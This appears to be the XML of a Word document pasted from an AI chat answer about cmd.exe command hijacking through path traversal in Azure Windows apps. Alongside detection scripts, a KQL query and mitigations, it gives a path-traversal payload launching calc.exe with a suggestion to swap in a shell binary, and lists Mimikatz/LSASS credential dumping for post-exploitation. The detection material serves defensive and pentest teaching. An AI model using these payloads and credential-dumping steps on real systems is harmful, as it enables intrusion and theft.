          <w:p w14:paraId="07836FD6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az vm run-command, directory search, source audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58661239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Focus on PHP, C#, Python apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="0014D95D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D197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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>🎯</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61666479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Determine unquoted input injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30294EE6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Fuzz user input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC49855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Look for “ping”, “tracert”, “netstat” in code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="0046DA3E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6827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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>💥</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="411F6FD2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Use path traversal payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E118F9F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/../../../../windows/system32/calc.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32BFB9C7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Replace tool name in command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="037AB91A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F32EC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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>🔓</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62C15CA1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Execute payload on Azure VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F0B6CFF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Use reverse shell binary path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64614AAD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Gain session or persist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="70E69C73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BD4A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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>🚪</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Post</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4139851E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Dump creds, escalate, lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56B4A371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Mimikatz, LSASS dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AEF1431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Target AAD Connect / WinRM exposed boxes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A0CE355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783CDBD1">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7A21F3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💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defense in Azure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6890"/>
      </w:tblGrid>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="436BD6F1" w14:textId="77777777" w:rsidTr="001E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53A99" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US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755D8D2" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="365E88EB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AF8C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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>🔐</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Application Hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76585916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Use escapeshellarg() or subprocess.run([...], shell=False)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="49DC59C5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76D0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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>📦</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Azure Defender for VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1055E26E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Detect suspicious use of cmd.exe and execution of unexpected binaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="772676FD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C32B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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>🚪</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>NSGs + JIT Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="588811FA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Restrict VM access to developers, disable webshells</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="14DFB5BA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B994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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>🛡️</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>App Service Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056F2B60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Place vulnerable apps in App Service Environment (ASE) with NSG rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005469C0" w:rsidRPr="00037A53" w14:paraId="45E5A75F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6EB8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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>📣</w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Sentinel Analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19E373FE" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="001E6B7C">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037A53">
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Alert on unusual processes or path traversal in command-line args</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1652C806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51C9E95F">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D03FDD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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Final Thoughts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E9ECE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This technique isn’t a memory corruption bug — it's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>logic flaw</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on misunderstanding how cmd.exe interprets inputs. In real-world Azure pentests, it becomes highly valuable when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F3468" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Web apps pass unsanitized input to Windows commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDA4A7B" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Security tools or admin scripts use lazy argument quoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40681C36" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hybrid cloud environments expose older PHP or .NET apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750F210D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4A0AB282">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073DCF7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Would you like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ready-to-use detection rule</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PHP audit script</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for spotting this in Azure apps?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0E9A3" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5040005C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425AA3B6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Great! Below is a practical toolkit tailored for </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure penetration testing and blue team validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, focused on detecting and exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cmd.exe command hijack via path traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Windows-based Azure environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47523D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176F0CA1">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AAED4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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Part 1: PowerShell Detection Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981A520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This script scans directories (like IIS or app folders) for suspicious cmd.exe /c usage, especially where arguments aren’t quoted properly—often used in web shells or misconfigured scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA8999D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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell – Scan for Unsafe cmd.exe /c Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819DF79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# PowerShell script to detect potential vulnerable use of cmd.exe /c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639EEAB7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$searchPath = "C:\inetpub\wwwroot"  # Change as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F4C70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$pattern = 'cmd.exe\s*/c\s*".*?(\s+[^"]*[/\\]\.\.[/\\])+'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14445C5A" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D979F3F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Get-ChildItem -Path $searchPath -Recurse -Include *.ps1,*.php,*.js,*.py,*.config,*.bat -ErrorAction SilentlyContinue |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4F05A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A459CF1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    $content = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA280C6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    if ($content -match $pattern) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143300C0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      Write-Host "`n[!] Possible vulnerable usage in $($_.FullName):"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B090E8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      ($content -split "`n") | Where-Object { $_ -match 'cmd.exe\s*/c' } | ForEach-Object { Write-Host "    $_" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3CEE1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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381442DD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  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55E9CE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1A444971">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F775A8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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Part 2: PowerShell Exploitation Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E695E35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If you're on a pentest and find a web app or service calling cmd.exe /c "ping $userInput", here's a test payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B500F98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🧨</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Test (Open Calculator):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1972E2C2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# Craft a path traversal payload to trigger calc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771EA37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$payload = "127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18333399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Start-Process "cmd.exe" -ArgumentList "/c ping $payload"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4F3278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Replace calc.exe with your own payload or binary if aiming for shell access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C502726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48C23C6E">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA9287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☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Part 3: Azure CLI - Find Suspect Files in Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD427F3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Use this to search all your VMs for files containing unsafe usage of cmd.exe (if you have Azure Run Command permissions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D6620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🔎</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Search Azure VMs with Azure CLI + Run Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3713B317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# List VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA4E8D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az vm list -d --query "[].{name:name, resourceGroup:resourceGroup}" -o tsv | while read name rg; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31343EDB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  echo "[*] Scanning $name in $rg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C23E9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  az vm run-command invoke \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA7F02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    --resource-group "$rg" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A472FA5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    --name "$name" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB7E18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    --command-id RunPowerShellScript \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46213E8D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    --scripts @detect-cmd-injection.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04698D47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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D9F67" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Save the PowerShell detection script from Part 1 as detect-cmd-injection.ps1 before running this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B91E9E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5E9533A2">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D851F7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🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bonus: Auto-Gather cmd.exe Process Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCD3DEA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Use this to check for runtime abuse of cmd.exe in Azure VMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCCE192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Get-WmiObject Win32_Process -Filter "Name='cmd.exe'" |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F67449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Select-Object ProcessId, CommandLine, CreationDate |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D7CA9E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Sort-Object CreationDate -Descending</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84EEC8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1CEAA85E">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C96844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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Blue Team: Sentinel / Defender for Endpoint Detection Idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1CB0D" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00037A53" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>KQL Query Example for Microsoft Defender for Endpoint or Sentinel:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C77D19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DeviceProcessEvents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01171DF3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| where FileName =~ "cmd.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE49C1C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| where ProcessCommandLine has "/c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5345DE26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| where ProcessCommandLine has "../../../../"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A684679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| project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6474A9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7149E1CE">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC5608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Would you like a standalone </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PowerShell scanner module</w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00037A53">
        <w:rPr>
          <w:b/>
